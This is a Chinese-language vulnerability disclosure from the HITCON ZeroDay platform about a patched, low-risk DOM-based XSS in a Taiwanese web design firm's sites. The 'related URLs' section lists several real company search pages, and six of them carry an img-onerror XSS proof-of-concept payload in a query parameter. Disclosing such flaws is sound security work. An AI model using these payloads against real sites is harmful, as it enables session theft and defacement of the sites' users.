大可設計軟體科技有限公司產品存在XSS

Vulnerability Overview

ZDID: ZD-2025-00059
發信 Vendor: 大可設計軟體科技有限公司
Title: 大可設計軟體科技有限公司產品存在XSS
Introduction: XSS

處理狀態

目前狀態

公開

Last Update : 2025/02/14

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2025/01/10 13:11:00 : 新提交 (由普普通通的小名更新此狀態)
2025/01/10 13:48:51 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/01/17 17:21:55 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/01/17 17:21:56 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/02/07 15:38:44 : 複測申請中 (由組織帳號更新此狀態)
2025/02/10 11:51:24 : 確認已修補 (由普普通通的小名更新此狀態)
2025/02/14 03:06:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-00059
通報者：W_NICK_W (普普通通的小名)
風險：低
類型：基於 DOM 的 XSS (DOM-based Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份，或進行掛碼、轉址等攻擊行為。

漏洞說明： OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則：
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

XSS 防禦繞過方式：
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

相關網址

https://www.dake.com.tw/product?main=7
http://www.yicheng-tn.com.tw/search_page.php
https://www.nt-movie.com.tw/search_movie.php
https://www.tunggwo.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
http://www.baoshiang.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
https://www.suntech-seed.com.tw/search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
http://www.shin-li.com.tw/product_search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
http://www.hengda.com.tw/product_search.php?SrchTxt=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
https://www.astone-helmets.com.tw/p_search.php?SrchTxt=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E